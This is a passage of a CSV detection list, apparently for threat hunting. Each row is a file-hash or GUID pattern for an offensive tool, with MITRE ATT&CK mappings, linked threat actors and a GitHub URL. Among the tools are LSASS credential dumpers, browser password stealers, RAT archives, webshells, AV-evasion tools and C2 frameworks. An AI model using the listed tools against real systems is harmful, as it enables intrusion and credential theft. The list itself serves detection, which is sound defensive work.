"*b949f1eeba7260b233e58123507605328133428e37bbccb6aa2dd9ba68cf18b5*",".{0,1000}b949f1eeba7260b233e58123507605328133428e37bbccb6aa2dd9ba68cf18b5.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","35064" "*b94ad2d15b45c6a236d1414f787f59fe0a9d3538c0591c6764e67a77b4869948*",".{0,1000}b94ad2d15b45c6a236d1414f787f59fe0a9d3538c0591c6764e67a77b4869948.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35065" "*b94e6e9fe00aa1789f2b29bada37cd9fbf2dffe29cab668b1500621830dd1040*",".{0,1000}b94e6e9fe00aa1789f2b29bada37cd9fbf2dffe29cab668b1500621830dd1040.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35066" "*b950b16b3e207f829f926b62cd1e75e774d57f9e676dcf01191d054fac7dd2f5*",".{0,1000}b950b16b3e207f829f926b62cd1e75e774d57f9e676dcf01191d054fac7dd2f5.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. 
store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","35067" "*b9554f35c8c8dc4a5b428322fea2fa3a00cec87a17c5ed276a6dfe804f3828ed*",".{0,1000}b9554f35c8c8dc4a5b428322fea2fa3a00cec87a17c5ed276a6dfe804f3828ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35068" "*b95885582cc9fc5ac5491deeb5469e36b5eacafd2699579c3a8eeb6ce1a9e0dd*",".{0,1000}b95885582cc9fc5ac5491deeb5469e36b5eacafd2699579c3a8eeb6ce1a9e0dd.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","35070" 
"*B9635D08-2BB2-404B-92B7-6A4981CB34F3*",".{0,1000}B9635D08\-2BB2\-404B\-92B7\-6A4981CB34F3.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","35073" "*b9709f5925db2c34124f1f590251a4b059e594d480223b2aaaaf1e9085f5eace*",".{0,1000}b9709f5925db2c34124f1f590251a4b059e594d480223b2aaaaf1e9085f5eace.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","35075" "*b9760df5de508a4b3b655a3de28ae5ab271d4189299513c848a033f9480d5766*",".{0,1000}b9760df5de508a4b3b655a3de28ae5ab271d4189299513c848a033f9480d5766.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35077" "*b97733c8926c8186363f74a875b92d7749bb06f2edc94280322d6f5b9af22798*",".{0,1000}b97733c8926c8186363f74a875b92d7749bb06f2edc94280322d6f5b9af22798.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35078" "*b979225195d70240e32deae75233b82e05ceb32bab4d08d970399065fba8ea88*",".{0,1000}b979225195d70240e32deae75233b82e05ceb32bab4d08d970399065fba8ea88.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","35079" "*b97aed185c60d0b6764cdcd4c6133d09c0f028ed4a53e766d75b42418765e0c4*",".{0,1000}b97aed185c60d0b6764cdcd4c6133d09c0f028ed4a53e766d75b42418765e0c4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35080" "*b988905cfe09a6fb9a8f034a2efb0403731b2eeb29e19403d3eaade2b02fdfbd*",".{0,1000}b988905cfe09a6fb9a8f034a2efb0403731b2eeb29e19403d3eaade2b02fdfbd.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","35081" "*b99078f0abc00a579cf218f3ed1d1ca89fffd5c328239303bf98432732df00f0*",".{0,1000}b99078f0abc00a579cf218f3ed1d1ca89fffd5c328239303bf98432732df00f0.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - 
T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","#filehash","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","35083" "*b990e7cba87af7e6a61a0c326047e99c0750313e6c9bec82ab4b6e2ff757d8e3*",".{0,1000}b990e7cba87af7e6a61a0c326047e99c0750313e6c9bec82ab4b6e2ff757d8e3.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35084" "*b9919cdb3ebf7abed7458e357a71924bb0dd43332e90c30a6f146caefcf56baa*",".{0,1000}b9919cdb3ebf7abed7458e357a71924bb0dd43332e90c30a6f146caefcf56baa.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","35085" "*b9946bcbb56b9088f6d5ab8660665ea8f80c5f3d08df6e4531362653d07de2c9*",".{0,1000}b9946bcbb56b9088f6d5ab8660665ea8f80c5f3d08df6e4531362653d07de2c9.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","35087" "*b9af7e45ec82950abedd3e86d466d275f0e19856c0a0fe52fc9c2349d77aa7c2*",".{0,1000}b9af7e45ec82950abedd3e86d466d275f0e19856c0a0fe52fc9c2349d77aa7c2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","35093" "*b9d5e62f9504669d9f3f68ff4b0e0fbce20d9b48c5a2560cb0d71b37666bb013*",".{0,1000}b9d5e62f9504669d9f3f68ff4b0e0fbce20d9b48c5a2560cb0d71b37666bb013.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35097" "*b9d705378ce1af446cc51bbbeccdda2d05bbc6b3c9249f3b69661d5f763dafaa*",".{0,1000}b9d705378ce1af446cc51bbbeccdda2d05bbc6b3c9249f3b69661d5f763dafaa.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","35098" "*b9de1ac4e68a0c4be90109880892b3b34a296d02102d94f1f79913fcd4806922*",".{0,1000}b9de1ac4e68a0c4be90109880892b3b34a296d02102d94f1f79913fcd4806922.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","35099" "*b9e0d24db9c2db196bf5290e2ea67913ba908e69e951c62a89a6e80e90c40a0e*",".{0,1000}b9e0d24db9c2db196bf5290e2ea67913ba908e69e951c62a89a6e80e90c40a0e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","35100" "*b9f0a5f6d8d717f469a530d9796bece42e455e201da01012c717098f0cac53d5*",".{0,1000}b9f0a5f6d8d717f469a530d9796bece42e455e201da01012c717098f0cac53d5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35103" 
"*b9fb14ee0bd4d442599f5178c6acc88c382d35c67c9d9ce4293505b47c529fd7*",".{0,1000}b9fb14ee0bd4d442599f5178c6acc88c382d35c67c9d9ce4293505b47c529fd7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35104" "*b9fcab4af77e110405b886ebf88159fc07f5da5f69d5d872867db2ee0809acb9*",".{0,1000}b9fcab4af77e110405b886ebf88159fc07f5da5f69d5d872867db2ee0809acb9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35105" "*ba052c32cb079708df013cb6801329b186f0fe1a4c6e1c134e839a795ac6bcf9*",".{0,1000}ba052c32cb079708df013cb6801329b186f0fe1a4c6e1c134e839a795ac6bcf9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35106" "*ba0ec36076382b07332c8d5329ccec4c577ec5d6527c1a6dc56694744763024c*",".{0,1000}ba0ec36076382b07332c8d5329ccec4c577ec5d6527c1a6dc56694744763024c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35107" "*ba18587fbe9f6bdf1f7cfe3c3e9c102775fc4aada581dfc058dc9e781e75de01*",".{0,1000}ba18587fbe9f6bdf1f7cfe3c3e9c102775fc4aada581dfc058dc9e781e75de01.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35109" "*BA1F3992-9654-4424-A0CC-26158FDFBF74*",".{0,1000}BA1F3992\-9654\-4424\-A0CC\-26158FDFBF74.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#GUIDProject","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","35110" "*BA1F3992-9654-4424-A0CC-26158FDFBF74*",".{0,1000}BA1F3992\-9654\-4424\-A0CC\-26158FDFBF74.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#GUIDProject","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","35111" 
"*ba20280d3b1e1ba3539232ee1b32c6071958811da1cb6716aeb33480977da408*",".{0,1000}ba20280d3b1e1ba3539232ee1b32c6071958811da1cb6716aeb33480977da408.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","#filehash","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","35112" "*ba41cc2f4c5dfb7df874b0e92f99f33b37b11574aab288d229749eba00e98813*",".{0,1000}ba41cc2f4c5dfb7df874b0e92f99f33b37b11574aab288d229749eba00e98813.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#filehash","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","35114" "*ba5925e3a8778e1bf0a38085336d8cff3bfe162fe425bc5a93fcb8ae5bb7ebfd*",".{0,1000}ba5925e3a8778e1bf0a38085336d8cff3bfe162fe425bc5a93fcb8ae5bb7ebfd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35117" "*ba635e7771b43f21a15114a4f209241d85142f937fd9e2d65a39015a2822b9fc*",".{0,1000}ba635e7771b43f21a15114a4f209241d85142f937fd9e2d65a39015a2822b9fc.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35119" "*ba64c77b96c7de18007ca116ca8c8f93c3bba3cdc631e1a041e9d0afb46ae989*",".{0,1000}ba64c77b96c7de18007ca116ca8c8f93c3bba3cdc631e1a041e9d0afb46ae989.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","35120" "*ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404*",".{0,1000}ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35123" "*ba79187d6d0fbec4e1b989565e8ec192547c400826d9d3fcd7fd4b4c506bbe27*",".{0,1000}ba79187d6d0fbec4e1b989565e8ec192547c400826d9d3fcd7fd4b4c506bbe27.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35124" "*ba7aa4e5aba5fa90f17a2aca9cee62a2b01bb1fc91f6433643e48cdfa4b1c03d*",".{0,1000}ba7aa4e5aba5fa90f17a2aca9cee62a2b01bb1fc91f6433643e48cdfa4b1c03d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","35125" "*ba7e216ca801f1b05c2cc100226b5d8f90263ee92f910a6febf637bb7ae3bec7*",".{0,1000}ba7e216ca801f1b05c2cc100226b5d8f90263ee92f910a6febf637bb7ae3bec7.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","35127" "*ba81b4c4203d94358c4b0b725b4f905ddfb9b4edea7ad6e097d770485e5a8679*",".{0,1000}ba81b4c4203d94358c4b0b725b4f905ddfb9b4edea7ad6e097d770485e5a8679.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35128" "*ba84810ab6a2d27ffa9303915bbd18e1703d032dd133cf93ceeecf89e2f59fe6*",".{0,1000}ba84810ab6a2d27ffa9303915bbd18e1703d032dd133cf93ceeecf89e2f59fe6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35130" 
"*ba873651f323f87c83b99bccdbb136706dd1bcdc5fb29164be0bd8ebff2770ae*",".{0,1000}ba873651f323f87c83b99bccdbb136706dd1bcdc5fb29164be0bd8ebff2770ae.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","35131" "*ba912bf7875b66acdc47babd2884d56d240eb07eda2a9384ab0dd79f2e29f252*",".{0,1000}ba912bf7875b66acdc47babd2884d56d240eb07eda2a9384ab0dd79f2e29f252.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35134" "*ba933871cda9e4c84297af7c34424c01d565e7f3968f14e8bae4ec26e7f7b389*",".{0,1000}ba933871cda9e4c84297af7c34424c01d565e7f3968f14e8bae4ec26e7f7b389.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35135" "*ba9340aea52ef7176b56c69287e191d7919e73fb5e59bc6b059136740f375dc6*",".{0,1000}ba9340aea52ef7176b56c69287e191d7919e73fb5e59bc6b059136740f375dc6.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","35136" "*ba9660f0473b88e967d6eaeff0671afb20617fe49fe028a4d543e42edd0a8476*",".{0,1000}ba9660f0473b88e967d6eaeff0671afb20617fe49fe028a4d543e42edd0a8476.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35137" "*ba97f0a315cf16438bb5318e47ddad24ec2bc6c851881b8ac5e3c27258d4b484*",".{0,1000}ba97f0a315cf16438bb5318e47ddad24ec2bc6c851881b8ac5e3c27258d4b484.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","35138" "*ba99e7ff67fb59ab551943030c912a2dfa0c9f1e1bba2c3e53a71aa5348386ec*",".{0,1000}ba99e7ff67fb59ab551943030c912a2dfa0c9f1e1bba2c3e53a71aa5348386ec.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense 
